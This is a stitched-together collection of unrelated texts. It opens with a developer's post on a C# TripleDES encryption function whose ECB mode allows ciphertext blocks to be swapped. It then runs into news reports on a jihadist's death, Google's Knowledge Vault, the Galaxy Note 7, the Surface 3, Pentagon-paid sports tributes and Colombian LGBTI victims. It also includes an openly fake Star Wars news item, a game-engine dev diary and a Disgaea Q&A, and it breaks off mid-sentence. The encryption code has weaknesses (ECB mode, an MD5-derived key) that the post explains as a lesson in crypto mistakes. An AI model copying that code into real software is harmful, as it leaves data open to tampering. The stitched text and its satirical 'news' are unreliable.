public static string Encrypt(string toEncrypt, string key, bool useHashing) { byte[] keyArray = UTF8Encoding.UTF8.GetBytes(key); byte[] toEncryptArray = UTF8Encoding.UTF8.GetBytes(toEncrypt); if (useHashing) keyArray = new MD5CryptoServiceProvider().ComputeHash(keyArray); var tdes = new TripleDESCryptoServiceProvider() { Key = keyArray, Mode = CipherMode.ECB, Padding = PaddingMode.PKCS7 }; ICryptoTransform cTransform = tdes.CreateEncryptor(); byte[] resultArray = cTransform.TransformFinalBlock( toEncryptArray, 0, toEncryptArray.Length); return Convert.ToBase64String(resultArray, 0, resultArray.Length); }
This is how our symmetric encryption function works:
We start with a secret string we want to protect. Let's say it is "password123". We pick a key. Let's use the key "key-m4st3r" Before encrypting, we'll prefix our secret with a salt to prevent dictionary attacks. Let's call our salt "NaCl".
We'd call the function like so:
Encrypt("NaCl" + "password123", "key-m4ast3r", true);
The output is a base64 encoded string of the TripleDES encrypted byte data. This encrypted data can now be sent to the client without any reasonable risk that the secret string will be revealed. There's always unreasonable risk, of the silent black government helicopter sort, but for all practical purposes there's no way someone could discover that your password is "password123" unless your key is revealed.
In our case, we were using this Encrypts() method to experiment with storing some state data in web pages related to the login process. We thought it was secure, because the data was encrypted. Sure it's encrypted! It says Encrypt() right there in the method name, right?
Wrong.
There's a bug in that code. A bug that makes our encrypted state data vulnerable. Do you see it? My coding mistakes, let me show you them!
string key = "SuperSecretKey"; Debug.WriteLine( Encrypt("try some different" + " 00000000000000000000000000000000 ", key, true).Base64ToHex()); Debug.WriteLine( Encrypt("salts" + " 00000000000000000000000000000000 ", key, true).Base64ToHex()); 3908024fc33b55c3 4e885c8946b80735 704cbe2a41d25f21 81bb6d726bd35152 81bb6d726bd35152 81bb6d726bd35152 1367f10f2584ace3 4ae7661295a98e46 81bb6d726bd35152 81bb6d726bd35152 81bb6d726bd35152 4ee5d23b3b5e3eb4
(I'm using strings with multiples of 8 here to make the Base64 conversions easier.)
Do you see the mistake now? It's a short trip from here to unlimited data tampering, particularly since the state data from the login process contained user entered strings. An attacker could simply submit the form as many times as they like, chop out the encrypted attack values from the middle, and insert them into the next encrypted request -- which will happily decrypt and be processed as if our code had sent it down!
The culprit is this line of code:
{ Key = keyArray, Mode = CipherMode.ECB , Padding = PaddingMode.PKCS7 }
Which, much to our embarrassment, is an incredibly stupid parameter to use in symmetric encryption:
The Electronic Codebook (ECB) mode encrypts each block individually. This means that any blocks of plain text that are identical and are in the same message, or in a different message encrypted with the same key, will be transformed into identical cipher text blocks. If the plain text to be encrypted contains substantial repetition, it is feasible for the cipher text to be broken one block at a time. Also, it is possible for an active adversary to substitute and exchange individual blocks without detection.
It's fairly standard for symmetric encryption algorithms to use feedback from the previous block to seed the next block. I honestly did not realize that it was possible to pick a cipher mode that did not do some kind of block chaining! CipherMode.ECB ? More like CipherMode.Fail !
So, what have we learned?
If it doesn't have to be sent to the client, then don't! Secrets sent to the client can potentially be tampered with and compromised in various ways that aren't easy to see or even predict. In our case, we can store login state on the server and avoid transmitting any of that state to the client altogether.
It isn't encryption until you've taken the time to fully understand the concepts behind the encryption code. Specifically, we didn't notice that our encryption function was using a highly questionable CipherMode that allowed block level substitution of the encrypted data.
Luckily, this was a somewhat experimental page on the site, so we were able to revert back to our standard server-side approach rather quickly once the exploit was discovered. I'm no Bruce Schneier, but I have a reasonable grasp of encryption concepts. And I still completely missed this problem.
So the next time you sit down to write some encryption code, consider the above two points carefully. Otherwise, like us, you'll be left wondering why your encryption isn't... encrypting.
(Thanks to Daniel LeCheminant for their assistance in discovering this issue.)
In this photo released on May 4, 2015, by a militant website, which has been verified and is consistent with other AP reporting, Islamic State militants pass by a convoy in Tel Abyad town, northeast Syria. (Militant website via AP)
Fugitive Indian Mujahideen commander Muhammad “Bada” Sajid has been killed while fighting with Islamic State forces in Syria, online jihadist media claimed on Friday.
Advertising
Isabah Media, the propaganda wing of the Indian jihadist group Ansar ul-Tawhid, announced “the martyrdom of our brother Abu Turab al-Hindi on the forefront of the war for Islam in Kobani”. The statement, in Arabic, identified Sajid by their real name in parenthesis.
The 30-year-old Sajid, from Sanjarpur in UP, had been named by the National Investigation Agency (NIA) as one of the perpetrators of the Indian Mujahideen bombings of 2008 that killed at least 166 people and injured hundreds in New Delhi, Ahmedabad and Jaipur.
[related-post]
Reports have also emerged of the killing in Syria of two other Indians, identified in jihadist media only by the pseudonyms Abu Talha and Abu Muhammad.
Advertising
Bhatkal resident Sultan Abdul Kadir Armar and Thane call centre employee Saheem Tanki had earlier been claimed by jihadist media to have died fighting in Syria.
One tweet on Sajid said: “Before Abu Turaab [Sajid] got shahadah [martyrdom], three brother[s] dreamt about them marrying a hoor-ul-ayn [virgin in paradise]”. Another tweet claimed that they had been “waging jihad in India since they were 12 years old”.
News of Sajid's death was also tweeted from a handle believed to be controlled by Fahd Sheikh who, along with Tanki, was among the four youngsters from Thane who were the first Indians to join the IS, as reported by The Indian Express on July 13, 2014.
Indian intelligence officials told The Indian Express that news of Sajid's death in Kobani had circulated amongst their contacts in India three days ago. “It's near-impossible to gain on-ground verification but the information we have suggests that the report of Sajid's death is accurate,” an official said.
Educated at the Madrasa Islah in Azamgarh district, Sajid worked briefly as a diamond polisher in Mumbai. Investigators involved in the 2008 case said they were drawn to the Indian Mujahideen by the head of its north India network, the slain terrorist Atif Amin.
Following the unravelling of the Indian Mujahideen's networks in 2008, Sajid and Sultan Armar from Bhatkal, who was later killed, is believed to have fled through Nepal and UAE to Pakistan.
Across the border, Sajid is believed to have been part of a group of Indian Mujahideen operatives who parted ways with the organisation's leader Riyaz Shahbandri, also known as Riyaz Bhatkal. Last year, the rebels formed the Ansar al-Tauhid group, initially based at Tehreek-e-Taliban training camps in Pakistan's North Waziristan.
Little information has emerged on the identities of the other two Indians claimed to have been killed in Kobani.
However, the alias Abu Talha was known to have been used by Haja Fakkurudeen Usman Ali, a Tamil Nadu-born Singapore resident who left for Turkey along with their family on January 22, 2014, and then disappeared across the Syrian border.
Advertising
Police in Singapore later claimed that Fakkurudeen had intended to fund a network of Indian jihadists, led by Gul Mohamed Maracachi Maraicar, a resident of Cuddalore in Tamil Nadu who was stripped of their Singapore residency and repatriated to India in February.
Indian investigators have, however, been unable to find adequate evidence to initiate prosecution against Maraicar, who is believed to be cooperating with authorities.
Sohei Niikawa, President of Nippon answered some questions during an AMA on Reddit. Many questions were focused on the possibility of amiibo for Disgaea, a new sequel for Phantom Bravel and the possibility of a new Disgaea game for Switch.
We've picked some of the top questions asked during the AMA.
Q. Now that Disgaea is on the Switch, are there any plans to make Disgaea Amiibo?
A. We would love to make a Disgaea amiibo. Let's get a petition going! We'll 1 million signatures! Hopefully that will get Nintendo on board.
Q. Are there any plans for the next Disgaea game to be on the Switch?
A. Most likely…
Q. Will we ever get a Phantom Brave sequel?
A. This was a story that I originally did not have a sequel planned for. However, there are many people at NIS that have asked this same question and some that even join the company with desires of creating a sequel. I would love to see these people get together and perhaps create a Phantom Brave 2.
Q. What was the biggest inspiration in creating disgaea? Was it to change how SRPGS are made?
A. I wanted to create Disgaea because…
After I created La Pucelle I was thinking about what to make next… Keep in mind, back then we were only capable of creating one game… Therefore we gave it our all into one title per year. (if it tanked our company would go down under…)
I thought really really hard because I had peoples lives on the line… and the answer I came up with was… やべぇ分かんねぇ(Translation: Crap, I don't know)
So, I got together with the head game designer and head art director and decided on one thing: The game will be set in the Netherworld. I wanted a demon main character and by doing this we thought we would be allowed to do anything. (no morals, I guess)
Lastly, We combined our ideas that we thought would be fun and that's how Disgaea was created.
Also, we didn't really want to change the SRPG, we just wanted to do something different. We're a small company away from the city, so we couldn't compete with bigger companies in the city.
Q. I love that the latest game made its way to the Switch, for my question I was wondering if you'll continue to bring future Disgaea games to the Switch?
A. Currently we don't have any plans to release past Disgaea games on the Switch, but if things go well with Disgaea 5 Complete, this is definitely something we would like to look into.
The search giant is automatically building Knowledge Vault, a massive database that could give us unprecedented access to the world's facts
(Image: Nikada/Getty)
Search this
GOOGLE is building the largest store of knowledge in human history – and it's doing so without any human help.
Instead, Knowledge Vault autonomously gathers and merges information from across the web into a single base of facts about the world, and the people and objects in it.
Advertisement
The breadth and accuracy of this gathered knowledge is already becoming the foundation of systems that allow robots and smartphones to understand what people ask them. It promises to let Google answer questions like an oracle rather than a search engine, and even to turn a new lens on human history.
Knowledge Vault is a type of “knowledge base” – a system that stores information so that machines as well as people can read it. Where a database deals with numbers, a knowledge base deals with facts. When you type “Where was Madonna born” into Google, for example, the place given is pulled from Google's existing knowledge base.
This existing base, called Knowledge Graph, relies on crowdsourcing to expand its information. But the firm noticed that growth was stalling; humans could only take it so far.
So Google decided it needed to automate the process. It started building the Vault by using an algorithm to automatically pull in information from all over the web, using machine learning to turn the raw data into usable pieces of knowledge.
Knowledge Vault has pulled in 1.6 billion facts to date. Of these, 271 million are rated as “confident facts”, to which Google's model ascribes a more than 90 per cent chance of being true. It does this by cross-referencing new facts with what it already knows.
“It's a hugely impressive thing that they are pulling off,” says Fabian Suchanek, a data scientist at Télécom ParisTech in France.
Google's Knowledge Graph is currently bigger than the Knowledge Vault, but it only includes manually integrated sources such as the CIA Factbook.
Knowledge Vault offers Google fast, automatic expansion of its knowledge – and it's only going to get bigger. As well as the ability to analyse text on a webpage for facts to feed its knowledge base, Google can also peer under the surface of the web, hunting for hidden sources of data such as the figures that feed Amazon product pages, for example.
Tom Austin, a technology analyst at Gartner in Boston, says that the world's biggest technology companies are racing to build similar vaults. “Google, Microsoft, Facebook, Amazon and IBM are all building them, and they're tackling these enormous problems that we would never even have thought of trying 10 years ago,” they say.
The potential of a machine system that has the whole of human knowledge at its fingertips is huge. One of the first applications will be virtual personal assistants that go way beyond what Siri and Google Now are capable of, says Austin.
“Before this decade is out, we will have a smart priority inbox that will find for us the 10 most important emails we've received and handle the rest without us having to touch them,” Austin says. Our virtual assistant will be able to decide what matters and what doesn't.
Other agents will carry out the same process to watch over and guide our health, sorting through a knowledge base of medical symptoms to find correlations with data in each person's health records. IBM's Watson is already doing this for cancer at Memorial Sloan Kettering Hospital in New York.
Knowledge Vault promises to supercharge our interactions with machines, but it also comes with an increased privacy risk. The Vault doesn't care if you are a person or a mountain – it is voraciously gathering every piece of information it can find.
“Behind the scenes, Google doesn't only have public data,” says Suchanek. It can also pull in information from Gmail, Google+ and YouTube. “You and I are stored in the Knowledge Vault in the same way as Elvis Presley,” Suchanek says. Google disputes this, however. In an email to New Scientist, a company spokesperson said, “The Knowledge Vault does not deal with personal information.”
“Google doesn't only have access to public data. You and I are stored in the same way as Elvis Presley”
Google researcher Kevin Murphy and their colleagues will present a paper on Knowledge Vault at the Conference on Knowledge Discovery and Data Mining in New York on 25 August.
As well as improving our interactions with computers, large stores of knowledge will be the fuel for augmented reality, too. Once machines get the ability to recognise objects, Knowledge Vault could be the foundation of a system that can provide anyone wearing a heads-up display with information about the landmarks, buildings and businesses they are looking at in the real world. “Knowledge Vault adds local entities – politicians, businesses. This is just the tip of the iceberg,” Suchanek says.
Knowledge vault
Richer vaults of knowledge will also change the way we study human society “This is the most visionary thing,” says Suchanek. “The Knowledge Vault can model history and society.”
Google already has a way to track mentions of names over time using historical texts, measuring the popularity of Albert Einstein vs Charles Darwin, for instance. By adding knowledge bases – which know the gender, age and place of birth of myriad people – historians would be able to track more in-depth questions, such as the popularity of female singers over time, for example.
Suchanek has already carried out a version of this kind of data-driven history. By combining a knowledge base called YAGO with data from French newspaper Le Monde, they were able to show how the gender gap in French politics changed over time. This was only possible because YAGO knows the gender of every French politician, and can apply that knowledge to names mentioned in Le Monde. They will present the work at the Very Large Databases Conference in Hangzhou, China, in September.
It might even be possible to use a knowledge base as detailed and broad as Google's to start making accurate predictions about the future based on analysis and forward projection of the past, says Suchanek.
“This an entirely new generation of technology that's going to result in massive changes – improvement in how people live and have fun, and how they make war,” says Austin. “This is a quantum leap.”
This article appeared in print under the headline “Welcome to the oracle”
Since this article was first published, Google has contacted us to comment on its use of personal information. The company's view has been incorporated into the article.
Share
The Galaxy Note 7 doesn't have the best reputation — maybe because of all those pesky fires and explosions — yet Samsung is reportedly considering a new lease of life on the device with refurbished models, presumably at a lower price.
Rumors about the move have spread for a while, and reports consistently repeat much of the same information. A Samsung spokesperson told Digital Trends the company does not comment on rumors and speculation, but another spokesperson from Samsung India told Gadgets 360 that the latest report is incorrect.
“The report on Samsung planning to sell refurbished Galaxy Note 7 smartphone[s] in India is incorrect,” the spokesperson told Gadgets 360.
The report, which came from a South Korean source, claimed that Samsung is looking into swapping out existing Note 7 devices with a slightly smaller battery. This would reduce the space taken up by the battery inside the Note 7, one of the contributing factors in the phone's problems.
It's not the first time we've heard this. At the end of 2016, another report from South Korean outlet The Investor, said Samsung might be considering selling refurbished Note 7 smartphones beginning in 2017. The information came from an anonymous industry source, who said, “Samsung has not made a final decision yet, but it will likely sell the refurbished Note 7 units next year.”
Both reports say Samsung will sell its old Galaxy Note 7 handsets in emerging markets, namely India and Vietnam. It may have difficulty reintroducing the phone into markets where the phone was heavily recalled, and carriers may be wary about taking on a refurbished device with such a strong stigma attached to it. However, if the price is right, we have a feeling many will be prepared to ignore that.
The spokesperson from Samsung India said the company is not selling the refurbished device in India, but no other country was mentioned. It's possible Samsung could bring it to other countries, though we cannot verify these reports.
Samsung may be driven to re-release a fixed up Note 7 for several reasons. The massive cost involved in developing, building, releasing, and then recalling the phone is enormous, and it's mentioned the company may still have 2.5 million Note 7 phones hanging around its warehouses. Clawing back some revenue would ease the financial pain. Additionally, Samsung has environmental targets to meet, and those don't involve throwing out millions of smartphones. Rebuilding a safe Note 7 to sell on the remaining inventory would avoid this problem.
If you're given the chance, would you buy one?
Article originally published 11-15-2016. Updated on 02-22-2016 by Julian Chokkattu: Added in an official statement from Samsung, and Samsung India regarding a refurbished Galaxy Note 7.
Well, I received the mother of all drops this morning: Microsoft's new Surface 3 tablet plus a Surface 3 Type Cover, Surface Pen, and Surface 3 Docking Station. As familiar as I am with the Surface lineup, there were no major surprises during the admittedly giddy unboxing. But there are a number of interesting notes about this new device and its peripherals.
Before reading on, please be sure to check out my previous Surface 3 articles, which should provide a complete background on what's happening with this release. These include:
Here Comes Surface 3
Microsoft Provides More Details About Surface 3
Before Surface 3 Arrives, a Last Look at Surface 2
All Surface 3 Accessories are Now Available for Pre-Order
Photo Gallery: Surface 3 + Type Cover + Docking Station + Surface Pen
Now that I actually have the device in-hand I can do some testing. But here's what I've noticed right away.
Thin and light. Like Surface 2, Surface 3 is wonderfully thin and light, and regardless of which PC you're used to (assuming the same sized screen or bigger), it's amazing how light the device is.
Power. The trapezoidal microUSB power connector can only be plugged in one way of course, but it's easy to plug in and impossible to plug in incorrectly. This is a big win.
Screen. Placed next to Surface 2, the Surface 3 screen noticeably and delightfully offers more contrast, with much deeper colors. It's just gorgeous.
Performance. This will require time, of course. But it's not difficult to perform some (admittedly non-scientific) app launching tests side-by-side with Surface 2, in this case simultaneously launching apps I've never run on each. Put simply, Surface 3 launches Modern apps faster than Surface 2 every time. For example, Weather—7 seconds vs. 9 seconds—and Pictures (1 second vs. 2 seconds). These are literally first time every app launches, so I will install Office and other desktop apps and see how it goes. But the initial prognosis is that I see nothing troubling. Yet.
Type Cover. Thanks to the smaller size of the Surface 3, the Surface 3 Type Cover is smaller overall than that of the Surface Pro 3. But the keys and keyboard on the Type Cover are just about the same size, and if Microsoft hadn't told me they were a hair smaller, I'm not sure I'd have noticed. What's different is the layout of that top row of function keys. On Surface 3, the Windows 8-specific keys (Search, Share, Devices and Settings) are gone now, which is fine. And there's a dedicated Print Screen button, plus Insert, which is fantastic. The trackpad is a bit smaller.
Older Type Covers. I tested previous generation Type Cover 2 and Touch Cover 3 keyboard covers, and they work fine. When you cover the screen with such a cover, there's a bit of bezel uncovered, but I don't think most people will mind. Power Cover doesn't work (in that it can't power the tablet).
Volume buttons. This is the first Surface to put the volume buttons on the top. This was necessitated by the Docking Station, because the wings on that peripheral cover the sides of the tablet.
Microsoft logos everywhere. There's a shiny Microsoft flag logo on the back of the tablet, and a Microsoft logo under the kickstand. And the back of the Type Cover has a Microsoft logo too, where the Surface Pro 3 Type Cover has a Surface logo.
Surface Pen. When you buy a Surface Pro 3, you connect Surface Pen to the tablet during Setup. But because Surface 3 does not come with Surface Pen, this isn't available, so you need to connect it manually in PC Settings later.
Surface Pen loop. While I received the normal retail packaging for most of the Surface 3 hardware (which I really prefer because I want to get the normal customer experience), the Surface Pen I received just came in a plain plastic bag. There's no Surface Pen loop in the Type Cover packaging, and no Surface Pen loop with the Pen. So I'm not sure if anyone will get this. Or if you could just buy it separately. (They're hard to find.) UPDATE: Pen loop will come in the box with Surface Pen, Microsoft tells me, and will be color-coded to the pen. Obviously, some older silver Surface Pens will not have this loop until supplies run out.)
Crapware? This is a bit odd, and will be a bit controversial with some: Surface 3 ships with … crapware. It includes the Surface app, which is of course fine, but also third party apps like Drawboard PDF, Flipboard, and The New York Times Crossword. I'm not sure how I feel about this, but of course you can easily uninstall any of them.
Overall, no major surprises. But now I'm going to load it up with Chrome, Office 2013 and Photoshop Elements and see how it really runs.
More soon.
Tagged with Surface 3
Military tributes are a staple of professional sporting events, from surprise homecomings of veterans, to color guards, to enlisted men and women throwing out ceremonial first pitches. But according to an oversight report released Wednesday by Sens. Jeff Flake and John McCain of Arizona, many of these seemingly genuine displays of patriotism have actually been marketing stunts paid for by the Department of Defense with taxpayer money.
According to the latest report, a follow-up to one McCain released in May, military services have dished out $53 million in sports-related marketing and advertising contracts since 2012. Of that, more than $9 million went directly to teams in the five biggest American professional sports leagues (the NFL, MLB, NBA, NHL, and MLS). Although Flake and McCain determined that some contracts constituted legitimate marketing and advertising, such as stadium signs and recruiting booth space at games, 72 of the 122 contracts they uncovered involved inappropriately funded “patriotic tributes.”
Advertisement
What do these tributes look like? The Minnesota Vikings hosted military appreciation nights. The New York Jets held hometown hero ceremonies. The Atlanta Falcons invited National Guard members to sing the national anthem. The report calls these funded displays “boondoggles,” wasting taxpayer money and tricking fans into thinking they were watching “authentic, voluntary shows of support.”
Did one of your favorite teams take money from DOD for paid patriotism? Check the chart below.
Professional Sports Teams Receiving Pentagon Money,
2012-2015 Interactive: Katie Rose Quandt | Source: Tackling Paid Patriotism Report
Following McCain's oversight report earlier this year, DOD banned paid patriotism and the NFL instructed its teams to stop collecting payment for patriotic salutes. Flake and McCain write in this latest report that they were startled to discover many missing contracts in the military's official response to their request. Several of DOD's official contract summaries downplayed the arrangements, implying that some paid benefits had in fact been free, while documentation was incomplete.
They tumbled out of the bus all smiles and anticipation, a group of 26 Toronto kids about to celebrate Christmas like they never had before. And as they trundled into the toy store in the early morning hours, ready to ravage the shelves on an all-expenses-paid shopping spree, there at the end of the line came the choreographer of the event, their smile as wide as any of the youngsters eager to get started.
Toronto Raptors All-Star Kyle Lowry brought holiday cheer to 26 underprivileged youth Wednesday morning with a shopping trip to Toys R Us. ( Steve Russell / Toronto Star )
Kyle Lowry might have been having as much fun as any of the kids they treated to a Toys R Us shopping spree as part of their annual holiday celebration Wednesday morning. “I want to make children have faith in that something good will happen to them in their lives,” the Toronto Raptors point guard said. “It might not be the biggest thing, but it's more about me and my wife wanting to give back to the community that we live in, that we're a part of, that supports us.”
Article Continued Below
Lowry and the rest of the Raptors are fully immersed in the holiday season and their sense of responsibility to touch lives away from the game. They may not be from the city, but they are a part of it. “I've been here five years . . . I've grown as a man and a human being. I want to show them support for the way they supported me,” Lowry said. “The support I've gotten over the five years I've been here has been amazing, so it's resonates with me. “I want to give back, because this is a place I've called home for a long time. It's pretty cool.”
The shopping event — the second Lowry and their wife, Ayanha, have put on for Toronto children while also organizing a toy drive in their hometown of Philadelphia — saw 26 students from St. Paul Catholic School let loose for a 15-minute spree. It was a surprise sprung on them by Lowry during an appearance at the school's breakfast earlier in the morning. It continues a focus on family at the holidays that's been with Lowry for their entire 30 years. “My mom worked two jobs, my grandma worked a job. We always got surprises, always got some gifts.
Article Continued Below
“My mom and grandmom did a great job of making us understand, showing us that Christmas is supposed to be a wonderful time and I'm glad I had the opportunity to give back.” Lowry certainly isn't the only Raptor to be heavily involved in community initiatives at this time of year. Team officials proudly point out every player on the roster did something in the community in December. DeMarre Carroll was among the busiest and most diverse, doing everything from donating food, toys and other supplies to the Toronto Humane Society to starting a mentorship program and taking a group of 10 underprivileged children bowling Wednesday night while also covering their heating and electricity costs over the holidays. He, too, cited their youth and the influence of their family as the reason he's so active in their adopted hometown. “That's one thing my mom always told me, was you never should be down because someone has it worse than you do,” Carroll said. “I always take that and try to give back. “It's a blessing, bro. To know that you're done made somebody's Christmas, you're done made somebody happy? It's a blessing. At the end of the day, that's what we do all this for, for our families and to help others and to motivate, be a role model for others. “I feel like that's what God brought me here to do and that's what I want to do.” With their wife helping a student shopper and their 5-year-old son Carter goofing around with the Raptor, Lowry was completely content being with their family and making other kids feel good. “I want my family to be a part of it. I want them to enjoy it. I want everyone to be happy about it,” they said. “It's straight from the heart. People don't know me and they might think I'm an a------ on the court, but I come from a hard place. My mom was great, my grandma was great for me and they taught me well. You've got to give back in this world, no matter what.”
Read more about:
Following the high praise EA DICE received at this year's E3, the development team behind Star Wars Battlefront II has released a new render of a previously unplayable hero character in the Battlefront franchise. The fan favorite Gungan, Jar Jar Binks, will be a new playable hero in the new game.
According to a press release issued by Electronic Arts to select Star Wars sites and gaming news outlets, Jar Jar will be a part of The Last Jedi DLC pack but only for the Nintendo Switch version of the game.
EA DICE, Criterion Games, and Motive Studios are happy to announce that Jar Jar Binks will be among the first wave of free DLC for our upcoming game Star Wars Battlefront II. Binks will be a playable Hero for the Grand Army of the Republic as well as the First Order. Binks will have 2 skins of course, one based on their appearance in Episode I The Phantom Menace and another based on how they will appear in this December's Star Wars The Last Jedi. However, Jar Jar will be an exclusive character for the Nintendo Switch version of Battlefront II. We hope Switch players will enjoy this new addition to the already bountiful selection of playable Heroes.
Yes, you read that correctly. They will have a skin based on their Episode VIII appearance and fight for the First Order. This seemingly confirms that Jar Jar is indeed a secret villain of the sequel trilogy as many fans on Reddit have theorized that it was George Lucas's original vision for the character.
After we received this press release, one of our interns reached out to The Last Jedi director Rian Johnson for a comment on Twitter. Johnson's reply was a GIF of a dancing banana and prompt blocking of our intern. Take that as you will.
As always, keep it locked to FakingStarWars.net for all the Star Wars news worth faking. Don't forget to follow us on Twitter, Instagram and Facebook for even more unbelievable news from a galaxy far, far away.
-Link “Voxx” Voximilian
Please follow and like Faking Star Wars:
First off, I have to apologise. This post is a few days late, and I'm sure that all none of you who hang on my every word were beginning to froth at the mouth. Anyway, in this dev diary is an explanation of our audio system, because I worked on that this week. First, I'm going to explain how we handle files, because that's pretty cool too.
File Handling
If you know anything about GWT, you know about RPCs. Remote Procedure Calls are magical bits of code that ask a server to do something. Server-side code in GWT is “proper” Java (as opposed to Java compiled into Javascript), so you can do things like use the java.io libraries. This means that we can simply do filehandling on the server, so Flax'd ask the server to create, delete, clear files and the like. Easy, right? I know!
The problem, though, is that these methods are non-blocking. This is, naturally, one of the reasons that AJAX is used. There's a degree of multi-tasking going on. (Browsers generally limit network connections to two at a time, so it's a small degree, but a degree regardless)
Non-blocking methods mean that the code doesn't stop running while the call completes. Here's the rather big problem with that:
The client could ask the server to create a file asynchronously. Then the client may write to the file. However, the file the server's been asked to create might not actually exist yet, so your code breaks.
We get around this by using an event system. We were going to use events for other things anyway (like when loading certain parts of the engine, and for in-game things as well), so it was almost trivial to add an onFileLoaded event. I didn't architect the events system, so I'll shut up about them before I talk myself into a hole. Ciarán will probably talk about them in their next dev diary.
So, in summary, we read files like so:
The client asks the server to read a file and starts watching for an event, onFileLoadedEvent (we have such awesome names for things). Once the server has read the file, it fires off an onFileLoadedEvent, which takes the content of the file with it. The client catches that event and continues doing whatever it was doing with the contents of the file.
It's cheating a little because we're sort of blocking the non-blocking methods, but it works.
Audio
Now for the fun stuff.
Flax's audio, in keeping with the “we need no damn plugins” mentality, doesn't need any damn plugins. Provided, of course, that you're using a decent browser with support for the <audio> tag.
Really, what Flax's audio system does, is taken our custom JSON audio objects, convert them into audio tags, and insert them into the page. Then, JSNI methods are used to play or pause separate audio tags.
Audio, as well as many other sections of the engine, is based on JSON objects. Originally, we were going to use XML to do a straight conversion (XML to HTML is rather easy), but we switched to JSON when we got serialisation/de-serialisation working, for consistency's sake. Besides, doing it this way means it could also conceivably be done programatically (without using JSON files), though not without some work.
Really, it's a rather simple system. We've got an Audio object (accessed statically), which contains play, pause stop, load JSNI methods. We've then also got AudioContainer objects, which are used to create and add the html audio tags to the page, and contain things like the tag name, sources, etc. The audio JSON contains a large number of AudioContainer objects, which, when constructed, add themselves to the page.
It's perhaps not the most straightforward system I've ever thought of. However, it's the fourth time I've re-engineered the system, so I'm prepared to forgive myself. If you've got any bright ideas about how we should implement audio, I'd love to hear them (because I'm only like 60% happy with this solution).
Sorry for the somewhat rambling post today, college is starting again on Monday and I'm a little preoccupied in getting ready. Never fear, though, Flax development will keep going. A little thing like college won't stop us.
Previous Development Diaries
Given the trash talk Republicans have tossed at California lately, one might think the GOP is holding its national convention in Florida this week just to be as far away as possible from the Golden State.
To which many Californians might reply, “Say hi to Tropical Storm Isaac for us, OK?”
It's not as if Californians can't take a joke. Indeed, our state's often-bizarre politics have been fodder for comedians for decades. California is not in play in the presidential election, but now the country's most populous state has become a veritable punching bag as the GOP attempts to whip up voters nationwide by pointing to the Golden State's budget travails.
Republican presidential candidate Mitt Romney smack-talked California at an Aug. 8 campaign event in Iowa. “Entrepreneurs and businesspeople around the world and here at home think that at some point America is going to become like Greece or like Spain or Italy, or like California.
“Just kidding about that one — in some ways.”
It might've played well in the Hawkeye State — a battleground where four recent polls show President Barack Obama leading by less than 2 percentage points — but it doesn't reflect reality, economists and fiscal experts say.
“Anyone making that comparison is looking at things at a superficial level,” said Gabriel Petek, Standard & Poor's top analyst on California. “It's just a completely different level of problems.”
Petek likened California's budget woes to having a 30-year fixed mortgage and having to cut back on the household budget or make some extra money during lean times to make the mortgage payments. Greece and other bedraggled European economies, they said, are facing balloon payments and can stay solvent only if investor confidence remains strong enough to keep rolling over the debt.
“California is actually on a path of repair; it's making some progress toward improving, which is very much in contrast to what we see happening in Europe at this point,” they said. “The fact is, the general fund is at a historically low level when you compare it to the economy.”
Of course, in politics, one sarcastic jab begets another. “@MittRomney thinks CA is like Greece,” U.S. Sen. Barbara Boxer, D-Calif., tweeted two days after Romney's poke. “Maybe they should sell their $12M mansion in La Jolla & move to the Caymans?”
The next day, 2008 Republican vice presidential nominee Sarah Palin picked up the thread with a Facebook post calling California “a cautionary tale” for the nation's direction.
“Obama's America is today's California — complete with $100 billion taxpayer funded bullet trains to nowhere; out-of-control environmental extremists who have destroyed family farms and left some of the most fertile farmland in America fallow in order to protect a 3-inch fish; permanent high unemployment; government policies hostile to small-business job creators; crippling high taxes; an abysmal real estate market; bloated government that wastes taxpayer money; endless budget shortfalls due to massive unfunded liabilities; city after city declaring bankruptcy; and a state government run by, in the words of one Wall Street Journal writer, ‘a brothel of environmentalists, lawyers, public-sector unions and legislative bums,'” a breathless Palin wrote.
Christopher Thornberg, a founding partner of Beacon Economics and an expert in California's economy, said they would answer Palin's screed with a question: “If California is such a hellhole, as you describe, why does the state have some of the highest property values in the nation? You wouldn't think the land here would be worth a plug nickel, eh?”
Thornberg, who in an earlier job with UCLA's Anderson Forecast authored economic outlooks for California and its subregions, said he's not a Democrat, “but listening to the bull coming from that (Republican) side of the aisle, I'm getting ready to become one.”
They said California certainly has its problems — the dominance of public workers unions, a penchant for over-regulation and so on — but it also has a vibrant, multifaceted economy and a ratio of government workers to private-sector workers that's comparable with other states.
But with Democrats holding all statewide elected offices and majorities in both houses of the Legislature, they said, California is a convenient target for red-staters.
“They have nothing to lose by beating up on California; after all, the Republican Party here is a shambles. It's not like they'll be undermining themselves by knocking California,” they said. “Right-wingers inside the state constantly use California as a punching bag.”
The last GOP presidential candidate to carry California was George H.W. Bush, in 1988. Since then, Democratic nominees have won the state with ever-larger numbers. The state's Republican voter registration has plummeted 5 percentage points in the past decade to 30.5 percent.
GOP convention delegate Judy Lloyd, of Danville, who served in President George W. Bush's Labor Department, said Californians “deserve” the ridicule.
“I'd like to see us get things back under control,” said the upstate New York state native who moved to California in 1998 when Gov. Pete Wilson was leaving office. They “left the state in the black,” Lloyd said. “And look at where we are now.”
They said the convention delegation is heavy with prominent businesspeople such as 2010 gubernatorial candidate Meg Whitman, the former eBay CEO who now runs Hewlett-Packard — folks “who have actually built businesses and created jobs.”
“We take it seriously because we feel attached to our state and we want to learn from delegates from other states that are doing better and more prosperous than we are,” Lloyd said. “We love our weather. We love California. … But it's just not the same as it used to be.”
Josh Richman covers politics. Follow them at Twitter.com/josh_richman. Read the Political Blotter at IBAbuzz.com/politics.
BOGOTA — The LGBTI community (Lesbian, Gay, Bisexual, Transsexual/Transgender and Intersexual) in Colombia has suffered disappearances, forced migrations, mutilations, humiliation and abuse.
The phrase “damaged bodies, silent crimes” has come to be used by this community to describe their suffering often made even worse by the civil war that has torn Colombia apart over the past decades.
In 2011, Colombia passed Law 1448, commonly known as the Victims Law or Victims Compensation Law, meant to acknowledge and offer reparation to LGBTI who have faced abuse and violence.
As of now, 374 people belonging to the LGBTI community are registered with the reparation plan. The details of the reparations are still being developed, but indemnities of 20 to 30 times the current minimum wage and personal rehabilitation, together with a number of psychological measures, are being considered.
But behind the statistics, there are the stories of 278 forced displacements reported to the government. As this is the most common complaint, the Unit for Victims has identified patterns in threats and displacements by forces of the insurgent rebels.
The narratives of disappearances and displacements are repeated over and over. El Espectador has the details of three cases that are being assessed by the Unit for Victims:
Andrea
